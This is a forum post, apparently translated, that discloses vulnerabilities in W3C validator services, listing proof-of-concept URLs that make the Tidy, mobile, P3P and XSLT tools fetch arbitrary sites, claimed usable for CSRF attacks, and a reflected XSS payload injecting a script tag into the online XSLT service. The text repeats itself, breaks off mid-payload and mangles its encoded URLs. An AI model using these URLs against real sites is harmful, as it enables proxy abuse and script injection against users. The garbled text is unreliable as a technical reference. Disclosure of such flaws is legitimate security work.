New vulnerabilities at www.w3.org
Page 1 of 1
New vulnerabilities at www.w3.org
These are the Abuse of Functionality, Insufficient Anti-automation and Cross-Site Scripting vulnerability in http://www.w3.org - website World Wide Web Consortium (W3C). What
soon tell the website administrator.
Total vulnerable following validators W3C:
http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator
Abuse of Functionality:
http://www.w3.org/services/tidy?docAddr=http://google.com
http://validator.w3.org/mobile/check?docAddr=http://google.com
http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com
http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com
This functional sites can be used for CSRF attacks on other sites.
Insufficient Anti-automation:
On these pages is not protection against automated searches (captcha). To automate the conduct CSRF attacks on other sites.
XSS:
[url=http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=&xslfile=%3Cscript%3Ealert(document
soon tell the website administrator.
Total vulnerable following validators W3C:
http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator
Abuse of Functionality:
- Code:
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http% 3A% 2F% 2Fwww.w3.org% 2Fservices% 2Ftidy% 3FpassThroughXHTML% 3D1% 26docAddr% 3Dhttp% 253A%
252F% 252Fgoogle. com & xslfile = http% 3A% 2F% 2Fwww.w3.org% 2F2002% 2F08% 2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://google.com&xslfile=http% 3A% 2F% 2Fwww.w3.org% 2F2002% 2F08% 2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http% 3A% 2F% 2Fwww.w3.org% 2Fservices% 2Ftidy% 3FpassThroughXHTML% 3D1% 26docAddr% 3Dhttp% 253A% 252F%
252Fgoogle. com & xslfile = http://google.com
http://www.w3.org/services/tidy?docAddr=http://google.com
http://validator.w3.org/mobile/check?docAddr=http://google.com
http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com
http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com
This functional sites can be used for CSRF attacks on other sites.
Insufficient Anti-automation:
On these pages is not protection against automated searches (captcha). To automate the conduct CSRF attacks on other sites.
XSS:
[url=http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=&xslfile=%3Cscript%3Ealert(document
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» VoIP Vulnerabilities
» Facebook CSRF and XSS vulnerabilities
» Vulnerabilities in the WP-UserOnline for WordPress
» FreeBSD kernel level vulnerabilities
» Multiple vulnerabilities in MC Content Manager
» Facebook CSRF and XSS vulnerabilities
» Vulnerabilities in the WP-UserOnline for WordPress
» FreeBSD kernel level vulnerabilities
» Multiple vulnerabilities in MC Content Manager
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum